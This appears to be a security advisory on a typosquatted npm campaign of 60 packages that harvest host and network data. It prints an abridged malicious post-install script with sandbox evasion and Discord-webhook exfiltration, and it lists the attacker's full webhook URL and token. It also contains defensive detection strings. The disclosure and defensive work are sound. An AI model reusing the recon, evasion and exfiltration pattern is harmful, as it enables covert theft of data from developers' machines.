Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...
A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines.
The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors.
Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000.
### **Campaign Overview**
#### **Key Details**
- **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.).
- **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation.
- **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes.
- **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions.
#### **Attack Workflow**
1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. legitimate `react-xterm`).
2. **Post-Install Execution**: A script embedded in `package.json` triggers automatically during `npm install`.
3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths.
4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`).
5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims.
### **Technical Deep Dive**
#### **Malicious Code Analysis**
The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence:
```javascript
const os = require("os");
const dns = require("dns");
const https = require("https");

// Collect internal IPs and hostnames
function getIPAddress() {
  const networkInterfaces = os.networkInterfaces();
  // ... iterates NICs to find non-internal IPv4 addresses
}

// Fetch external IP and ISP details via ipinfo.io
function getExternalIP(cb) {
  https.get('https://ipinfo.io/json', (res) => { ... });
}

// Evade sandboxes: abort when the external hostname or home directory
// matches a known analysis environment
if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) {
  return;
}

// Exfiltrate to Discord (webhook URL defanged, token truncated)
const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/...";
https.request(webhookURL, ...).write(trackingData);
```
#### **Data Exfiltrated**
- **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`.
- **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`).
- **Project Context**: `package.json` name, version, installation path (`__dirname`).
#### **Evasion Techniques**
The script avoids analysis environments by checking:
- Cloud provider DNS strings (AWS, GCP).
- Lab-related hostnames (e.g., `LD.local`).
- Usernames or directories linked to research (e.g., `malicious`, `justin`).
### **Indicators of Compromise (IoCs)**
#### **Malicious Packages**
| **npm Account** | **Packages** (sample; 20 per account) |
|------------------------|--------------------------|
| `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` |
| `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` |
| `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` |
*[Full list of 60 packages](#iocs) available in Appendix.*
#### **Infrastructure**
- **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ`
- **External Service**: `ipinfo.io/json` (to geolocate victims).
### **MITRE ATT&CK Mapping**
| **Tactic** | **Technique** | **Details** |
|---------------------------|-----------------------------------------------|----------------------------------------------|
| **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. |
| **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. |
| **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. |
| **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. |
| **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. |
### **Implications and Risks**
#### **1. Supply Chain Vulnerabilities**
- **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks.
- **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement.
#### **2. Future Attack Scenarios**
- **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks.
- **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering.
#### **3. npm Ecosystem Weaknesses**
- **Delayed Takedowns**: Despite reports, npm has yet to remove packages, highlighting response gaps.
- **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector.
### **Expert Insights**
**Socket’s Threat Research Team**:
> _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_
> _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_
### **Mitigation Strategies**
#### **For Developers**
1. **Audit Dependencies**:
   ```bash
   npm ls --all # Check nested dependencies
   ```
   Cross-reference projects against the [IoCs list](#iocs).
2. **Disable Install Scripts**:
   ```bash
   npm config set ignore-scripts true
   ```
   This also skips legitimate build hooks (e.g., native addons), so run those explicitly for packages you trust.
3. **Use Lockfiles**: Commit `package-lock.json` and install with `npm ci` so resolved versions cannot silently change, preventing dependency hijacking.
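As an added example (not Socket's code or anything from the packages themselves), a small audit that applies the checks from steps 1 and 2 to constructed dependency manifests: it flags package names from the IoC table, any dependency declaring npm install hooks, and hook scripts containing the Discord-webhook or host-recon strings described in the technical section. The function names and the sample manifests are assumptions.

```javascript
// Package names from the IoC table above (the sample shown, not all 60).
const IOC_PACKAGES = new Set([
  "seatable", "hermes-inspector-msggen", "flipper-plugins", "e-learning-garena",
  "credit-risk", "react-xterm2", "datamart", "garena-admin", "coral-web-be",
  "kyutai-client", "seamless-sppmy", "netvis", "mbm-dgacha", "gunbazaar", "dof-ff",
]);
// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Strings that, inside a hook script, match the exfil/recon pattern described
// above (Discord webhook, external-IP lookup, NIC and DNS enumeration).
const SUSPICIOUS_TOKENS = [
  "discord.com/api/webhooks", "ipinfo.io", "os.networkInterfaces", "dns.getServers",
];

// Audit one package.json object plus the source of the file its hook runs.
// Returns a list of finding strings (empty means nothing flagged).
function auditManifest(manifest, scriptSource = "") {
  const findings = [];
  if (IOC_PACKAGES.has(manifest.name)) findings.push(`ioc-name:${manifest.name}`);
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    findings.push(`install-hook:${hook}`);
    const body = scripts[hook] + "\n" + scriptSource;
    for (const tok of SUSPICIOUS_TOKENS) {
      if (body.includes(tok)) findings.push(`suspicious:${tok}`);
    }
  }
  return findings;
}

// Audit a whole dependency tree; keyed by name@version, only flagged entries.
function auditTree(manifests) {
  const report = {};
  for (const { manifest, source } of manifests) {
    const f = auditManifest(manifest, source);
    if (f.length) report[`${manifest.name}@${manifest.version}`] = f;
  }
  return report;
}

// Constructed sample tree: a clean package, a typosquat with a recon hook
// (webhook token is a placeholder), and a benign package with a build hook.
const SAMPLE_TREE = [
  { manifest: { name: "react-xterm", version: "1.0.0", scripts: { test: "jest" } } },
  { manifest: { name: "react-xterm2", version: "0.0.3", scripts: { postinstall: "node index.js" } },
    source: 'const dns = require("dns");\nconst s = dns.getServers();\n' +
            'https.request("https://discord.com/api/webhooks/PLACEHOLDER").write(s);' },
  { manifest: { name: "left-pad-ish", version: "2.1.0", scripts: { postinstall: "node-gyp rebuild" } } },
];
```

Only the typosquat carries both an IoC name and suspicious strings; the benign `node-gyp rebuild` hook is still reported as an install hook so a reviewer can decide whether to allow it.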
#### **For Organizations**
- **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting).
- **Harden CI/CD**:
  - Restrict outbound traffic to block Discord webhooks.
  - Use ephemeral build environments to limit data exposure.
- **Network Segmentation**: Isolate developer machines from critical infrastructure.
#### **For npm**
- **Mandate 2FA for Publishers**: Prevent disposable account abuse.
- **Automated Script Analysis**: Scan packages for risky hooks pre-publication.